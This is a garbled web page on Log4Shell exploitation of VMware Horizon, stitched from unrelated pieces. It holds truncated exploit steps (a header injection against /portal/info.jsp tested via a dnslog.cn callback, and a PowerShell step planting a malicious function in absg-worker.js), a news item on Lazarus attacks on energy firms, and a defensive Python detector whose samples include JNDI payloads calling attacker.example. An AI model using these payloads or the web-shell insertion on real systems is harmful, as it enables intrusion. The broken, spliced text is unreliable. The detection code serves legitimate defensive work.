VMware Horizon is used to provide a remote desktop session to users via a web browser. Horizon has several components, one of which is the VMware View framework. This part of the application serves the web application that provides browser access to Horizon services. Navigating to the webpage for the application in a web browser will look something like the following: [screenshot omitted]

The vulnerability itself is in the “Accept-Language” header issued to the endpoint “/portal/info.jsp”. A complete web request to this endpoint is provided below:

GET /portal/info.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

To test for the vulnerability, let’s first grab a hostname from dnslog.cn and insert it in the following cURL command:

curl -vv -H "Accept-Language: \$

In my opinion, whoever wrote that deserves a medal. The command first looks for a line containing the text “()”. What is happening on that line is largely irrelevant to the attacker. It only occurs once in the absg-worker.js file and provides us with a great place to place a malicious function. The PowerShell command (only its trailing `| Set-Content $path` fragment survives on this page) then inserts a function similar to the one shown below:

if (String(req.url).

North Korean Advanced Persistent Threat (APT) group APT38, also known as the Lazarus group, is targeting energy companies in the U.S., Japan, and Canada. According to Cisco Talos, APT38 targets VMware Horizon instances by exploiting the widely prevalent Log4j vulnerabilities.

APT38, commonly known as Lazarus and Hidden Cobra, is a North Korean state-sponsored cybercrime group that earned infamy by orchestrating the $620 million Ronin Network crypto heist, the biggest cryptocurrency theft in history, in April 2022. It was also behind the WannaCry ransomware attack in 2017 and other data exfiltration and cyber espionage activities. The nation-state group kicked off its latest campaign against energy companies in February 2022, a couple of months before the Ronin Network crypto heist. According to threat research firm Cisco Talos, APT38’s campaign was active until July this year.

Lazarus established its initial entry point into internet-facing VMware Horizon installations by exploiting the highly prevalent Log4Shell vulnerabilities in the Java-based logging framework Log4j. Once in, Lazarus deployed VSingle and YamaBot, two malware strains exclusive to its operations, and a third “relatively simple” remote access trojan dubbed MagicRAT by Cisco Talos. The company clarified that Symantec and South Korea’s AhnLab previously detailed the campaign, but Lazarus has updated its M.O., evident from the use of MagicRAT. Lazarus first establishes a reverse shell and manually sets up a backdoor into the compromised systems through VSingle, which then allows it to establish another reverse shell. VSingle serves as a reconnaissance, backdoor and exfiltration tool to execute arbitrary code, download plugins, and create the possibility of lateral movement.

In July 2022, the Department of Homeland Security’s Cyber Safety Review Board (CSRB) described Log4Shell vulnerabilities as endemic given the ubiquity of Log4j across a multitude of computer and industrial control systems, servers, and networks. CSRB assessed that it could take up to a decade, maybe more, for organizations worldwide to patch Log4Shell flaws. However, it seems there are still systems that have not been patched yet. “The Log4j exploit used in these attacks has been known, and called critical, for over a year. In June of 2022, CISA issued an alert (AA22-174A) specifically addressing this threat. However, our adversaries are still able to find and exploit unpatched sites that are directly connected to the internet,” Erich Kron, security awareness advocate at KnowBe4, told Spiceworks. “This poses a huge threat to some of the most critical systems within the critical infrastructure space.”
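Since the write-up places the injection point in the Accept-Language header sent to /portal/info.jsp, a defender's first question is how to spot such probes in proxy or WAF captures, including the padded variants that hide the lookup prefix behind nested Log4j lookups. The following detector is an added example, not code from the page or from either write-up it draws on; the request-dict layout, the client addresses and the attacker.example hostnames are constructed sample data.

```python
import re
from typing import Iterable, List, Tuple

# Endpoint the write-up identifies as the Horizon injection point.
HORIZON_PATH = "/portal/info.jsp"

# Inner Log4j lookups that resolve to one character: ${lower:J}, ${upper:n},
# ${::-d}, ${env:UNSET:-i}. Collapsing them exposes a padded "${jndi:" prefix.
_ONE_CHAR_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}])\}|\$\{[^${}]*:-([^${}])\}")

def normalize_lookup(value: str) -> str:
    """Resolve nested single-character lookups innermost-first until stable."""
    previous = None
    while previous != value:
        previous = value
        value = _ONE_CHAR_LOOKUP.sub(lambda m: m.group(1) or m.group(2), value)
    return value.lower()  # Log4j matches the lookup prefix case-insensitively

def is_jndi_lookup(value: str) -> bool:
    """True when a header value contains a (possibly obfuscated) JNDI lookup."""
    return "${jndi:" in normalize_lookup(value)

def find_log4shell_attempts(requests: Iterable[dict]) -> List[Tuple[str, str, str, str]]:
    """Flag every captured request whose headers carry a JNDI lookup.
    Returns (client, path, header, severity); hits against the Horizon
    endpoint are rated 'high', JNDI strings elsewhere 'medium'."""
    hits = []
    for req in requests:
        for header, value in req["headers"].items():
            if is_jndi_lookup(value):
                severity = "high" if req["path"] == HORIZON_PATH else "medium"
                hits.append((req["client"], req["path"], header, severity))
    return hits

# Constructed sample of captured requests (e.g. a proxy export), not real traffic.
SAMPLE_REQUESTS = [
    {"client": "198.51.100.7", "path": "/portal/info.jsp",
     "headers": {"Accept-Language": "${jndi:ldap://attacker.example/a}"}},
    {"client": "198.51.100.9", "path": "/portal/info.jsp",
     "headers": {"Accept-Language":
                 "${${lower:J}${upper:n}${::-d}${env:UNSET:-i}:ldap://attacker.example/b}"}},
    {"client": "203.0.113.4", "path": "/portal/info.jsp",
     "headers": {"Accept-Language": "en-US,en;q=0.9"}},
    {"client": "203.0.113.5", "path": "/portal/webclient/index.html",
     "headers": {"User-Agent": "Mozilla/5.0 ${jndi:rmi://attacker.example/c}"}},
]

if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_REQUESTS):
        print("possible Log4Shell probe:", hit)
```

A callback to a logging hostname such as the dnslog.cn one the write-up uses for testing shows up only on the attacker's side, so the header-level match above is what a Horizon operator can actually alert on.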